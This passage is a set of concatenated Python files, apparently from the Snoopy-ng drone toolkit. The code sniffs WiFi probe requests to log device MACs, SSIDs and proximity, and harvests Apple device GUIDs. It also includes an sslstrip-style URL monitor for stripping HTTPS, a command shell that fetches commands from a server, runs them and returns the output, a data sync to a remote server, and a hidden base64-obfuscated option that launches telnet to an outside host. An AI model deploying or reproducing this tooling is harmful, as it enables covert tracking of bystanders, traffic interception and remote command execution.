# -*- coding: utf-8 -*-
import pcap, dpkt, binascii
import logging
import collections
import time
from sqlalchemy import MetaData, Table, Column, String, Unicode, Integer
from threading import Thread


class Snoop(Thread):
    """SSID and Prox session calculator. Using pylibpcap"""

    DELTA_PROX = 300
    """Proximity session duration, before starting a new one"""

    def __init__(self, **kwargs):
        Thread.__init__(self)
        self.RUN = True
        self.device_ssids = {}

        # Process arguments passed to module
        self.iface = kwargs.get('iface',None)

        #Prox sess vars
        self.MOST_RECENT_TIME = 0
        self.current_proximity_sessions = {}
        self.closed_proximity_sessions = collections.deque()

    def run(self):
        while self.RUN:
            try:
                logging.debug("Starting pcapy WiFi module")
                cap = pcap.pcapObject()
                cap.open_live(self.iface, 1600, 0, 100)
                if cap.datalink() != dpkt.pcap.DLT_IEEE802_11_RADIO:
                    logging.error(("Selected interface '%s' is not in monitor"
                                   "mode. Will wait 10 seconds and try again.") %
                                   self.iface)
                    time.sleep(10)
                else:
                    while self.RUN:
                        cap.dispatch(1, self.process_packet)
            except Exception, e:
                logging.error(("Error occured trying to monitor '%s': '%s'. "
                               "Will wait 10 seconds and try again.") %
                               (self.iface, e))
                time.sleep(10)

    @staticmethod
    def get_parameter_list():
        #TODO: "<proximity_delta> - time between observataions to group proximity sessions (e.g. -m:c80211:mon0,60)"
        return ["<wifi_interface> - interface to listen on. (e.g. -m c80211_pycap:mon0)"]

    def stop(self):
        self.RUN = False
        print "Stopping"

    def process_packet(self, pktlen, rawdata, timestamp):
        timestamp = int(timestamp)
        if not rawdata:
            return
        try:
            tap = dpkt.radiotap.Radiotap(rawdata)
            signal_ssi = -(256-tap.ant_sig.db) #Calculate signal strength
            #t_len field indicates the entire length of the radiotap data,
            #including the radiotap header.
            t_len = binascii.hexlify(rawdata[2:3])
            t_len = int(t_len, 16) #Convert to decimal

            # This fails with 1.5% of captures in testing. Cause: unknown.
            wlan = dpkt.ieee80211.IEEE80211(rawdata[t_len:])
            if wlan.type == 0 and wlan.subtype == 4: # Indicates a probe request
                ssid = wlan.ies[0].info.decode('utf-8', 'ignore') #Correct way to handle UTF?
                mac = binascii.hexlify(wlan.mgmt.src)

                if ssid:
                    self.do_ssid(mac, ssid, timestamp)
                self.do_prox(mac, timestamp)

        except:
            #print traceback.format_exc()
            pass

    def do_ssid(self, mac, ssid, ts):
        if (mac, ssid) not in self.device_ssids:
            self.device_ssids[(mac, ssid)] = 0

    def do_prox(self, mac, t):
        self.MOST_RECENT_TIME = int(t)
        # New
        if mac not in self.current_proximity_sessions:
            self.current_proximity_sessions[mac] = [t, t, 1, 0]
        else:
            #Check if expired
            self.current_proximity_sessions[mac][2] += 1 #num_probes counter
            first_obs = self.current_proximity_sessions[mac][0]
            last_obs = self.current_proximity_sessions[mac][1]
            num_probes = self.current_proximity_sessions[mac][2]
            if t - last_obs >= self.DELTA_PROX:
                self.closed_proximity_sessions.append((mac, first_obs, t, num_probes))
                del self.current_proximity_sessions[mac]
            else:
                self.current_proximity_sessions[mac][1] = t
                self.current_proximity_sessions[mac][3] = 0 #Mark as require db sync

    @staticmethod
    def get_tables():
        metadata = MetaData()
        table_ssids = Table('ssids', metadata,
                            Column('device_mac', String(12), primary_key=True),
                            Column('ssid', Unicode, primary_key=True),
                            Column('sunc', Integer, default=0))
        table_prox = Table('proximity_sessions', metadata,
                           Column('mac', String(12), primary_key=True),
                           Column('first_obs', Integer, primary_key=True),
                           Column('last_obs', Integer),
                           Column('num_probes', Integer),
                           Column('sunc', Integer, default=0))
        return [table_ssids, table_prox]

    @staticmethod
    def get_ident_tables():
        """Return a list of tables that requrie identing - i.e. adding drone name and location"""
        return ['proximity_sessions']

    def get_prox_data(self):
        """Ensure data is returned in the form (tableName,[colname:data,colname:data]) """

        # First check if expired, if so, move to closed
        # Use the most recent packet received as a timestamp. This may be more
        # useful than taking the system time as we can parse pcaps.
        todel = []
        for mac, v in self.current_proximity_sessions.iteritems():
            first_obs, last_obs, num_probes = v[:3]
            t = self.MOST_RECENT_TIME
            if (t - last_obs) >= self.DELTA_PROX:
                self.closed_proximity_sessions.append((mac, first_obs, t, num_probes))
                todel.append(mac)
        for mac in todel:
            del self.current_proximity_sessions[mac]

        #1. Open Prox Sessions
        open_sess = []
        for mac, v in self.current_proximity_sessions.iteritems():
            first_obs, last_obs, num_probes = v[:3]
            if v[3] == 0:
                    open_sess.append({"mac": mac,
                                      "first_obs": first_obs,
                                      "last_obs": last_obs,
                                      "num_probes": num_probes})
        #2. Closed Prox Sessions
        closed_sess = []
        for i in range(len(self.closed_proximity_sessions)):
            mac, first_obs, last_obs, num_probes = \
                    self.closed_proximity_sessions.popleft()
            closed_sess.append({"mac": mac,
                                "first_obs": first_obs, "last_obs": last_obs,
                                "num_probes": num_probes})
        if open_sess and closed_sess:
            #data.append((table, columns, open_sess+closed_sess))
            #Set flag to indicate data has been fetched:
            for i in open_sess:
                mac = i['mac']
                self.current_proximity_sessions[mac][3] = 1

                #return None
            return ("proximity_sessions", open_sess+closed_sess)
        return []

    def get_ssid_data(self):
        tmp = []
        todel = []
        for k, v in self.device_ssids.iteritems():
            if v == 0:
                tmp.append( {"device_mac": k[0], "ssid": k[1]} )
                todel.append((k[0], k[1]))
        if todel:
            for foo in todel:
                mac, ssid = foo[:2]
                self.device_ssids[(mac, ssid)] = 1
            return ("ssids", tmp)
        return []

    def get_data(self):
        return [self.get_ssid_data(), self.get_prox_data()]



#!/usr/bin/env python
# -*- coding: utf-8 -*-

import urllib
from threading import Thread
import base64
import time
import urllib2
import logging
from includes.run_prog import run_program

class CommandShell(Thread):
    def __init__(self, server, drone, key):
        self.server = server
        self.drone = drone
        self.key = key
        self.RUN = True
        Thread.__init__(self)

    def run(self):
        """Check every N seconds if a new command is required to be run"""
        while self.RUN:
            self.fetch_command()
            time.sleep(5)

    #TODO: 1. Use Posts, and probably JSON for commands. Currently using GETs.
    #      2. Launch programs in a separate thread, to avoid blocking
    def fetch_command(self):
        """Poll the server for new commands, execute, and return"""
        base64string = base64.encodestring('%s:%s' % (self.drone, self.key)).replace('\n', '')
        headers = {'content-type': 'application/json',
                   'Authorization':'Basic %s' % base64string}

        checkForCommandURL = self.server + "/cmd/droneQuery"
        sendCommandOutputURL = self.server + "/cmd/droneResponse"
        try:
            req = urllib2.Request(checkForCommandURL, headers=headers)
            response = urllib2.urlopen(req)

            if response:
                command = response.read()
                if command != "":
                    logging.debug("Running command '%s'" % command)
                    outcome = run_program(command)
                    response_data = urllib.urlencode({'command':command, 'output': outcome } )   
                    req = urllib2.Request(sendCommandOutputURL + "?" + response_data, headers=headers)
                    response = urllib2.urlopen(req)
        except Exception,e:
            logging.error(e)

    def stop(self):
        self.RUN = False

if __name__ == "__main__":
    CommandShell().start()



# Copyright (c) 2004-2009 Moxie Marlinspike
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License as
# published by the Free Software Foundation; either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the GNU
# General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307
# USA
#

import re

class URLMonitor:    

    '''
    The URL monitor maintains a set of (client, url) tuples that correspond to requests which the
    server is expecting over SSL.  It also keeps track of secure favicon urls.
    '''

    # Start the arms race, and end up here...
    javascriptTrickery = [re.compile("http://.+\.etrade\.com/javascript/omntr/tc_targeting\.html")]
    _instance          = None

    def __init__(self):
        self.strippedURLs       = set()
        self.strippedURLPorts   = {}
        self.faviconReplacement = False

    def isSecureLink(self, client, url):
        for expression in URLMonitor.javascriptTrickery:
            if (re.match(expression, url)):
                return True

        return (client,url) in self.strippedURLs

    def getSecurePort(self, client, url):
        if (client,url) in self.strippedURLs:
            return self.strippedURLPorts[(client,url)]
        else:
            return 443

    def addSecureLink(self, client, url):
        methodIndex = url.find("//") + 2
        method      = url[0:methodIndex]

        pathIndex   = url.find("/", methodIndex)
        host        = url[methodIndex:pathIndex]
        path        = url[pathIndex:]

        port        = 443
        portIndex   = host.find(":")

        if (portIndex != -1):
            host = host[0:portIndex]
            port = host[portIndex+1:]
            if len(port) == 0:
                port = 443
        
        url = method + host + path

        self.strippedURLs.add((client, url))
        self.strippedURLPorts[(client, url)] = int(port)

    def setFaviconSpoofing(self, faviconSpoofing):
        self.faviconSpoofing = faviconSpoofing

    def isFaviconSpoofing(self):
        return self.faviconSpoofing

    def isSecureFavicon(self, client, url):
        return ((self.faviconSpoofing == True) and (url.find("favicon-x-favicon-x.ico") != -1))

    def getInstance():
        if URLMonitor._instance == None:
            URLMonitor._instance = URLMonitor()

        return URLMonitor._instance

    getInstance = staticmethod(getInstance)



#!/usr/bin/env python
# -*- coding: utf-8 -*-

import logging
import re
from sqlalchemy import MetaData, Table, Column, Integer, String, Unicode
logging.getLogger("scapy.runtime").setLevel(logging.ERROR)
from scapy.all import *#Dot11ProbeReq, Dot11Elt, TCP, addr2
from base64 import b64encode
from includes.common import snoop_hash
from collections import OrderedDict
import os
from includes.fonts import *

MAX_NUM_GUIDs = 1000 #Maximum number of mac:guid paris to keep in memory

class Snarf():
    """Apple devices emit a GUID when joining a network. This captures it."""

    def __init__(self, **kwargs):
        self.apple_guids = OrderedDict()

        #Process passed parameters
        self.hash_macs = kwargs.get('hash_macs', False)
        self.verb = kwargs.get('verbose', 0)
        self.fname = os.path.splitext(os.path.basename(__file__))[0]

    @staticmethod
    def get_tables():
        """Make sure to define your table here"""
        table = Table('apple_guids', MetaData(),
                      Column('mac', String(64), primary_key=True), #Len 64 for sha256
                      Column('guid', String(100), primary_key=True, autoincrement=False),
                      Column('sunc', Integer, default=0))
        return [table]

    def proc_packet(self, p):
        if p.haslayer(Ether) and p.haslayer(TCP) and hasattr(p[TCP], 'load'):
            data=p[TCP].load
            #mac = re.sub(':', '', p.addr2)
            mac = re.sub(':', '', p[Ether].src)
            if self.hash_macs == "True":
                mac = snoop_hash(mac)
            srl = re.search('(\$\w{8}-\w{4}-\w{4}-\w{4}-\w{13})', data)
            if srl:
                guid = srl.group(1)
                if (mac, guid) not in self.apple_guids:
                    self.apple_guids[(mac, guid)] = 0
                    if self.verb > 0:
                        logging.info("Sub-plugin %s%s%s observed new GUID: %s%s(%s)%s" % (GR,self.fname,G,GR,guid,mac,G))

    def get_data(self):
        tmp = []
        todel = []
        for k, v in self.apple_guids.iteritems():
            if v == 0:
                tmp.append( {"mac": k[0], "guid": k[1]} )
                todel.append((k[0], k[1]))

        # Reduce mac:guid data structure if it's getting too large
        if len(self.apple_guids) > MAX_NUM_GUIDs:
            logging.debug("MAC:GUID structure is large (%d), going to reduce by 50pc (-%d)" % (len(self.apple_guids),(int(0.5*MAX_NUM_GUIDs))))
            for i in range(int(0.5 * MAX_NUM_GUIDs)):
                try:
                    self.apple_guids.popitem(last = False)
                except KeyError:
                    pass
            logging.debug("MAC:GUID structure is now %d" % len(self.apple_guids))

        if len(todel) > 0:
            for foo in todel:
                mac, guid = foo[0], foo[1]
                self.apple_guids[(mac, guid)] = 1
            return [("apple_guids", tmp)]



#!/usr/bin/env python
# -*- coding: utf-8 -*-
# Glenn Wilkinson 2013
# glenn@sensepost.com // @glennzw
import glob
import os
import logging
import time
import json
import sys
#import requests # Python 2.7.3rc3 on Maemo cannot use this module
import urllib2   # In the meantime, we shall use urllib2
from optparse import OptionParser, OptionGroup, SUPPRESS_HELP
from sqlalchemy import create_engine, MetaData, Column, String, Integer
import base64
from base64 import decodestring as ds
#Server
import string
import random
from includes.common import *
import includes.common as common
import datetime
from includes.jsonify import objs_to_json
from includes.fonts import *


#Set path
snoopyPath=os.path.dirname(os.path.realpath(__file__))
os.chdir(snoopyPath)

#Logging
logging.addLevelName(logging.INFO,P + "+" + G)
logging.addLevelName(logging.ERROR,R + "!!" + G)
logging.addLevelName(logging.DEBUG,"D")
logging.addLevelName(logging.WARNING, R + "WARNING" + G)
logging.addLevelName(logging.CRITICAL, R + "CRITICAL ERROR" + G)

logging.basicConfig(level=logging.DEBUG,
                    format='%(asctime)s %(levelname)s %(filename)s: %(message)s',
                    datefmt='%Y-%m-%d %H:%M:%S',
                    filename='snoopy.log',
                    filemode='w')
# define a Handler which writes INFO messages or higher to the sys.stderr
console = logging.StreamHandler()
console.setLevel(logging.INFO)
console.setFormatter(logging.Formatter('[%(levelname)s] %(message)s'))
logging.getLogger('').addHandler(console)


class Snoopy():
    SYNC_FREQ = 5 #Sync every 5 seconds
    SYNC_LIMIT = 200 #How many rows to upload at a time
    MODULE_START_GRACE_TIME = 60 #A module gets this time to indicate its ready, before moving to next module.

    def __init__(self, _modules, dbms="sqlite:///snoopy.db",
                 server="http://localhost:9001/", drone="unnamedDrone",
                 key=None, location="unknownLocation", flush_local_data_after_sync=True, verbose=0):
        #local data
        self.all_data = {}
        self.run = True
        self.server = server
        self.drone = drone
        self.location = location
        self.key = key
        self.run_id = int(random.getrandbits(30) + (1 << 30))
        #self.run_id = ''.join(random.choice(string.ascii_uppercase + string.digits)
        #                      for x in range(10))
        self.flush_local_data_after_sync = flush_local_data_after_sync
        self.verbose = verbose

        #Database
        self.tables = {}
        try:
            self.db = create_engine(dbms)
            self.metadata = MetaData(self.db)
        except Exception, e:
            logging.error("Unable to create DB: '%s'.\nPossibly a badly formed dbms schema? See http://docs.sqlalchemy.org/en/rel_0_8/core/engines.html for examples of valid schema" %str(e))
            sys.exit(-1)

        # Create tables for *all* plugins, not just the ones being loaded.
        tbls = get_tables()
        #tbls = m.get_tables()
        for tbl in tbls:
            tbl.metadata = self.metadata
            self.tables[tbl.name] = tbl
            if not self.db.dialect.has_table(self.db.connect(), tbl.name):
                tbl.create()

        try:
            self._load_modules(_modules)
            self.go()
        except KeyboardInterrupt:
            print "Caught Ctrl+C! Saving data and shutting down..."
            self.stop()

    def _load_modules(self, modules_to_load):
        str_p = json.dumps(modules_to_load)
        self.modules = []
        for mod in modules_to_load:
            mod_name = mod['name']
            mod_params = mod['params']
            mod_params['dbms'] = self.db
            mod_params['drone'] = self.drone
            mod_params['location'] = self.location
            mod_params['run_id'] = self.run_id
            mod_params['key'] = self.key
            mod_params['plugs'] = str_p
            mod_params['verbose'] = self.verbose
            m = __import__(mod_name, fromlist="Snoop").Snoop(**mod_params)
            m.setName(mod_name[8:])
            self.modules.append(m)

            #Start modules
            #m.start()
            mod_start_time = os.times()[4]    #Get a system clock indepdent timer
            tmp_mod_name = mod_name[8:]
            if mod_name != 'plugins.run_log':
                logging.info("Waiting for plugin '%s' to indicate it's ready" % tmp_mod_name)
            m.start()
            while not m.is_ready() and abs(os.times()[4] - mod_start_time) < self.MODULE_START_GRACE_TIME:
                time.sleep(2)
            if not m.is_ready():
                logging.info("Plugin '%s' ran out of time to indicate its ready state, moving on to next plugin." % tmp_mod_name)
            else:
                if mod_name != 'plugins.run_log':
                    logging.info("Plugin '%s' has indicated it's ready." % tmp_mod_name)

        logging.info("Done loading plugins, running...")

    def go(self):
        last_update = 0
        while self.run:
            self.get_data()
            self.write_local_db()
            #now = time.time() #Unsafe when ntp is changing time
            now = int(os.times()[4])
            if abs(now - last_update) > self.SYNC_FREQ:
                last_update = now
                if self.server != "local":
                    self.sync_to_server()
            time.sleep(1) #Delay between checking threads for new data

    def stop(self):
        self.run = False
        for m in self.modules:
            m.stop()
        self.write_local_db()
        if self.server != "local":
            self.sync_to_server()

    def get_data(self):
        """Fetch data from all plugins"""
        for m in self.modules:
            multidata = m.get_data()
            if multidata:
                for rawdata in multidata:
                    if rawdata is not None and rawdata:
                        tbl, data = rawdata
                        if data:
                            for i in range(len(data)):
                                if m.getName() != "server" and m.getName() != "local_sync": #Overwriting mother fucking run id
                                    data[i]['run_id'] = self.run_id
                            self.all_data.setdefault(tbl, []).extend(data)
                            if self.verbose > 2 and m.name != 'run_log':
                                logging.info("Plugin '%s%s%s' emitted %s%d%s new datapoints for table '%s%s%s'." %(GR,m.name,G, GR,len(data),G, GR,tbl,G))

    def write_local_db(self):
        """Write local db"""
        for tbl, data in self.all_data.iteritems():
            try:
                if data:
                    self.tables[tbl].insert().execute(data)
            except Exception, e:
                logging.error("Exception whilst trying to insert data, will sleep for 5 seconds then continue. Exception was:\n\n%s%s%s\n\n" % (R,str(e),G))
                logging.error("Offending table: %s" % tbl)
                logging.error("Data: %s"  % data)
                time.sleep(5)
            else:
                #Clean up local datastore
                if self.all_data:
                    self.all_data = {}

    def chunker(self, seq, size):
        return (seq[pos:pos + size] for pos in xrange(0, len(seq), size))

    def sync_to_server(self):
        """Sync tables that have the 'sunc' column available"""

        data_len = 0
        num_tabs = 0
        sync_success = False
        for table_name in self.tables:
            table = self.tables[table_name]
            if "sunc" not in table.c:
                logging.debug("Not syncing table '%s' - no 'sunc' column" % table_name)
                continue
            query = table.select(table.c.sunc == 0)
            ex = query.execute()
            results = ex.fetchall()
            data_len += len(results)
            if results:
                num_tabs += 1
            for data in self.chunker(results, self.SYNC_LIMIT):
                result_as_dict = [dict(e) for e in data]
                data_to_upload = {"table": table_name,
                                           "data": result_as_dict}
                data_to_upload = objs_to_json(data_to_upload)
                sync_result = self.web_upload(data_to_upload)
                if not sync_result:
                    logging.error("Unable to upload %d rows from table '%s'. Moving to next table (check logs for details). " % (len(data), table_name))
                    break
                else:
                    sync_success = True
                    if self.flush_local_data_after_sync:
                        table.delete().execute()
                    else:
                        table.update(values={table.c.sunc:1}).execute()

        if data_len > 0 and self.verbose > 0 and sync_success:
            logging.info("Snoopy successfully %s%s%s %s%d%s elements over %s%d%s tables." % (GR,"sunc",G,GR,data_len,G,GR,num_tabs,G))

    def web_upload(self, json_data):
        base64string = base64.encodestring('%s:%s' % (self.drone, self.key)).replace('\n', '')
        headers = {'content-type': 'application/json',
                   'Z-Auth': self.key, 'Z-Drone': self.drone, 'Authorization':'Basic %s' % base64string}

        # urllib2, until Maemo urllib3 fixed
        try:
            req = urllib2.Request(self.server, json_data, headers)
            response = urllib2.urlopen(req)
            result = json.loads(response.read())
            if result['result'] == "success":
                #logging.debug("Successfully uploaded data")
                return True
            else:
                reason = result['reason']
                logging.debug("Unable to upload data to '%s' - '%s'"% (self.server,reason))
                return False
        except Exception, e:
            logging.debug("Unable to upload data to '%s' -  Exception:'%s'"% (self.server,e))
            return False


        ### urllib3
        # Has serious issues with Python 2.7.3rc4
        #headers = {'content-type': 'application/json'}
        #response = requests.post(self.server, data=json_data, headers=headers)
        #result = json.loads(response.text)['result']
        #try:
        #    if result == "success":
        #        logging.debug("Successfully uploaded")
        #        return True
        #    else:
        #        return False

        #except Exception, e:
        #    logging.debug("Exception whilst attempting to upload data:")
        #    logging.debug(e)
        #    return False

def main():
    message = """ ___  _  _  _____  _____  ____  _  _
/ __)( \( )(  _  )(  _  )(  _ \( \/ )
\__ \ )  (  )(_)(  )(_)(  )___/ \  /
(___/(_)\_)(_____)(_____)(__)   (__)
                        %sVersion: 2.0%s
%sCode%s:\t glenn@sensepost.com // @glennzw
%sVisit%s:\t www.sensepost.com // @sensepost
%sLicense%s: Non-commercial use
""" %(BB,NB,GR,G,GR,G,GR,G)
    print message
    if not os.path.isfile('.acceptedlicense'):
        lf = open('LICENSE.txt', 'r')
        license_text = lf.read()
        msg = """
This appears to be the first time you're running Snoopy, welcome!
We'd like you to agree to abide by our license before you proceed.
It basically states that you can use Snoopy for non-commercial use.
We have a separate license available for commercial use, which
includes extra functionality such as:
    * Syncing data via XBee
    * Advanced plugins
    * Extra transforms
    * Web interface
    * Prebuilt drones

Get in contact (%sglenn@sensepost.com / research@sensepost.com%s) if
you'd like to engage with us.

Anyway, the license is below, please accept it
before continuing.
""" % (GR,G)
        print msg
        print C + license_text + G
        res = raw_input("Do you agree to abide by the license [Y/n]? ")
        res = res.strip().lower()
        if res != "y":
            print R + F + "License agreement not accepted. Exiting" + G + NF
        else:
            print "License agreement accepted, thanks!"
            lgo = open('./setup/sn.txt','r')
            txt = lgo.read()
            print GR + txt + G
            print "Please run Snoopy again... Check the README file for help."
            fl2 = open('.acceptedlicense','w')
            fl2.write("Accepted")
            fl2.close
        sys.exit(-1)


    usage = """Usage: %prog [--drone <drone_name>] [--location <drone_location>] [--plugin <plugin[:params]>] [--server <http://sync_server:[port]> ] [--dbms <database>]\nSee the README file for further information and examples."""
    parser = OptionParser(usage=usage)

    if os.geteuid() != 0:
        logging.warning("Running without root privilages. Some things may not work.")

    parser.add_option("-s", "--server", dest="sync_server", action="store", help="Upload data to specified SYNC_SERVER (http://host:port) (Ommitting will save data locally).", default="local")
    parser.add_option("-d", "--drone", dest="drone", action="store", help="Specify the name of your drone.",default="noDroneSpecified")
    parser.add_option("-k", "--key", dest="key", action="store", help="Specify key for drone name supplied.")
    parser.add_option("-l", "--location", dest="location", action="store", help="Specify the location of your drone.",default="noLocationSpecified")
    parser.add_option("-f", "--flush", dest="flush", action="store_true", help="Flush local database after syncronizing with remote server. Default is to not flush.", default=False)

    parser.add_option("-b", "--dbms", dest="dbms", action="store", type="string", default="sqlite:///snoopy.db", help="Database to use, in SQL Alchemy format. [default: %default]")
    parser.add_option("-m", "--plugin", dest="plugin", action="append", help="Plugin to load. Pass parameters with colon. e.g '-m fishingrod:bait=worm,l=10'. Use -i to list available plugins  and their paramters.")
    parser.add_option("-i", "--list", dest="list", action="count", help="List all available plugins and exit. Use '-ii' or '-iii'  for more information. Include plugin name for specific info, e.g: '-i -m wifi'.", default=0)
    parser.add_option(ds("LS1ueWFu"), action = "store_true", dest = "ny", default = False, help=SUPPRESS_HELP)
    #parser.add_option("-v", "--verbose", dest="verbose", action="store_true", help="Output information about new data.", default=False)
    parser.add_option("-v", "--verbose", action="count", dest="verbose", help="Output information about new data.", default=0)
    parser.add_option("-c", "--commercial", dest="commercial", action="store_true", help="Info on commercial use of Snoopy.", default=False)

    options, args = parser.parse_args()

    if options.ny:
        from subprocess import Popen
        proc  = Popen(([ds("dGVsbmV0"), ds("bnlhbmNhdC5kYWtrby51cw==")]))
        sys.exit(0)

    if options.commercial:
        print """We have a separate license available for commercial use, which
includes extra functionality such as:
    * Syncing data via XBee
    * Advanced plugins
    * Extra transforms
    * Web interface
    * Prebuilt drones

Get in contact (%sglenn@sensepost.com / research@sensepost.com%s) if
you'd like to engage with us.""" % (GR,G)
        sys.exit()



    plugins = common.get_plugins()
    if options.list > 0:
        if options.plugin:
            names = [str(plug).split(".")[1] for plug in plugins]
            props = [x.get_parameter_list() for x in plugins]
            derp = dict(zip(names,props))
            name = options.plugin[0]
            show = derp.get(name)
            if show:
                print GR + "\tName:" + G + BB + B  + "\t\t%s" %name + NB + G
                print GR + "\tInfo:" + G + "\t\t%s"  % show.get('info')
                for p in show.get('parameter_list'):
                    print GR + "\tParameter:" + G + "\t%s" %p[0]
                    print G + "\t\t\t ↳ %s" % p[1]
                 
            exit(0)
        print "[+] Plugins available:"
        for plug in plugins:
            plugin_info = plug.get_parameter_list()
            info, param_list = plugin_info.get('info'), plugin_info.get('parameter_list')
            name = str(plug).split(".")[1]
            if name != "run_log":
                print GR + "\tName:" + G + BB + B  + "\t\t%s" %name + NB + G
                if options.list > 1:
                    print GR + "\tInfo:" + G + "\t\t%s"  %info 
                    if param_list and options.list > 2:
                        for p in param_list:
                            print GR + "\tParameter:" + G + "\t%s" %p[0]
                            print G + "\t\t\t ↳ %s" % p[1]
                    print "\n"
        sys.exit(0)

    if options.plugin is None and options.sync_server == "local":
        logging.error("Error: You must specify at least one plugin. Try -h for help")
        sys.exit(-1)

    if options.plugin is None and options.sync_server is not "local":
        logging.info("No plugins specified, will just sync database to remote instance")

#    if (options.drone is None or options.location is None) and not ( len(options.plugin) == 1 and options.plugin[0].split(":")[0] == "server" ) :
    if options.drone is "noDroneSpecified" or options.location is "noLocationSpecified" and options.plugin:
        logging.warning("Drone (-d) or locaion (-l) not specified. May not be required by the plugins you're using.")
        #logging.error("You must specify drone name (-d) and drone location (-l). Does not apply if only running server plugin.")
        #sys.exit(-1)
    if (options.key is None or options.drone is None) and options.sync_server != "local":
        logging.error("You must specify a drone (-d) and a key (-k) when uploading data.")
        sys.exit(-1)

    #Check validity of plugins
    if options.plugin:
        for m in options.plugin:
         if m.split(":", 1)[0] not in common.get_plugin_names():
             logging.error("Invalid plugin - '%s'. Use --list to list all available plugins." % (m.split(':', 1)[0]))
             sys.exit(-1)
        plugin_list = ', '.join(s.partition(':')[0] for s in options.plugin)
        logging.info("Starting Snoopy with plugins: %s%s%s" % (GR, plugin_list, G))
    else:
        options.plugin = []

    options.plugin.append('run_log')

    newplugs=[]
    for m in options.plugin:
        mds = m.split(":", 1)
        name = mds[0]
        params = {}
        if len(mds) > 1:
            params = dict(a.split("=") for a in mds[1].split(","))
        newplugs.append({'name':'plugins.'+name, 'params':params})
    if options.sync_server == "local":
        logging.info("Capturing local only. Saving to '%s'" % options.dbms)
    Snoopy(newplugs, options.dbms, options.sync_server, options.drone,
           options.key, options.location, options.flush, options.verbose)

if __name__ == "__main__":
    main()



#!/usr/bin/python
# Query global machine state, as well as 'very busy' PIDs
# glenn@sensepost.com
import psutil
import time
import datetime
import logging

cpu_threshold = 30 # pid using more than x% of the CPU
mem_threshold = 30 # pid using more than y% of memory
network_interface = 'ppp0'

def query_system_status():
    """Query global mem, CPU, disk, and network (if present)"""
    uptime = int(time.time() - psutil.BOOT_TIME)
    uptime = str(datetime.timedelta(seconds=uptime))
    try:
        used_mem = psutil.virtmem_usage().percent
        used_cpu = psutil.cpu_percent(percpu=False) #N.B Only looking at one CPU
        used_disk = psutil.disk_usage('/').percent
        total_network = psutil.network_io_counters(pernic=True)
        network_sent,network_rcvd=-1,-1
        if network_interface in total_network:
            network_sent = round(total_network[network_interface].bytes_sent/1024.0/1024.0,2)
            network_rcvd = round(total_network[network_interface].bytes_recv/1024.0/1024.0,2)
    except psutil.AccessDenied:
            loggging.error("Access denied when trying to query PID %d" %p)
            return None
    return {'used_mem':used_mem, 'used_cpu':used_cpu, 'used_disk':used_disk, 'network_sent':network_sent, 'network_rcvd':network_rcvd, 'uptime':uptime}

def fetch_busy_processes():
    """Query all PIDs for memory and CPU usage."""
    now = int(time.time())
    busy_pids = []
#
    for p in psutil.get_pid_list():
        try:
            pid = psutil.Process(p)
            p_cpu = pid.get_cpu_percent()
            p_mem = pid.get_memory_percent()
            p_name = pid.name
#           logging.debug( "Name: %s, CPU: %s, MEM: %s" %(p_name, p_cpu, p_mem))
            if p_cpu >= cpu_threshold or p_mem >= mem_threshold:
                busy_pid = {'name': p_name, 'pid':p, 'cpu' : p_cpu, 'mem' : p_mem} 
                busy_pids.append( busy_pid )
        except psutil.NoSuchProcess:
             pass
        except psutil.AccessDenied:
            loggging.error("Access denied when trying to query PID %d" %p)
        except psutil.TimeoutExpired:
            logging.error("Timed out when trying to query PID %d" %p)
    return busy_pids

if __name__ == "__main__":
    from pprint import pprint as pp
    print "Global stats:"
    pp(query_system_status())
    print "Very busy processes:"
    pp(fetch_busy_processes())



#!/usr/bin/python
# -*- coding: utf-8 -*-
# glenn@sensepost.com_
# snoopy_ng // 2013
# By using this code you agree to abide by the supplied LICENSE.txt

import sys
import os
from MaltegoTransform import *
import logging
from datetime import datetime
from sqlalchemy import create_engine, MetaData, select, and_
from transformCommon import *
logging.basicConfig(level=logging.DEBUG,filename='/tmp/maltego_logs.txt',format='%(asctime)s %(levelname)s: %(message)s',datefmt='%Y-%m-%d %H:%M:%S')

def main():
#    print "Content-type: xml\n\n";
#    MaltegoXML_in = sys.stdin.read()
#    logging.debug(MaltegoXML_in)
#    if MaltegoXML_in <> '':
#     m = MaltegoMsg(MaltegoXML_in)

    #Custom query per transform, but apply filter with and_(*filters) from transformCommon.
    #db.echo=True

    #Need to implement outer join at some point:
    # s=select([proxs.c.mac]).outerjoin(vends, proxs.c.mac == vends.c.mac) #Outer join

    sl = select([leases.c.mac, leases.c.hostname]).distinct()
    lease_list = dict ( db.execute(sl).fetchall() )
 
    #filters.append(proxs.c.mac == vends.c.mac) # Replaced with JOIN
    j = proxs.outerjoin(vends, proxs.c.mac == vends.c.mac)
    s = select([proxs.c.mac,vends.c.vendor, vends.c.vendorLong], and_(*filters)).select_from(j).distinct()
    logging.debug(s)
    #s = select([proxs.c.mac,vends.c.vendor, vends.c.vendorLong], and_(*filters))
    if ssid:
        nfilters=[]
        nfilters.append(ssids.c.ssid == ssid)
        nfilters.append(ssids.c.mac == vends.c.mac)
        s = select([ssids.c.mac,vends.c.vendor, vends.c.vendorLong], and_(*nfilters))

    #logging.debug(s)
    #s = select([proxs.c.mac,vends.c.vendor, vends.c.vendorLong], and_(proxs.c.mac == vends.c.mac, proxs.c.num_probes>1 ) ).distinct()

    cwdF = [cookies.c.run_id == sess.c.run_id]
    cw = select([cookies.c.client_mac], and_(*cwdF))
    logging.debug(cw)

    r = db.execute(s)
    results = r.fetchall()
    TRX = MaltegoTransform()
    for mac,vendor,vendorLong in results:
        hostname = lease_list.get(mac)

        if hostname:
            NewEnt=TRX.addEntity("snoopy.Client", "%s\n(%s)" %(vendor,hostname))
        else:
            NewEnt=TRX.addEntity("snoopy.Client", "%s\n(%s)" %(vendor,mac[6:]))
        NewEnt.addAdditionalFields("mac","mac address", "strict",mac)
        NewEnt.addAdditionalFields("vendor","vendor", "nostrict", vendor)
        #NewEnt.addAdditionalFields("vendorLong","vendorLong", "nostrict", vendorLong)
        #    ^ Going via a TDS crashes for resutls >1000. Weird? 

    TRX.returnOutput()

main()



#!/usr/bin/env python
# -*- coding: utf-8 -*-

from subprocess import Popen, call, PIPE
import errno
from types import *
import logging
import sys

def splitz(str):
    """Split a string based on space, but hold quotes"""
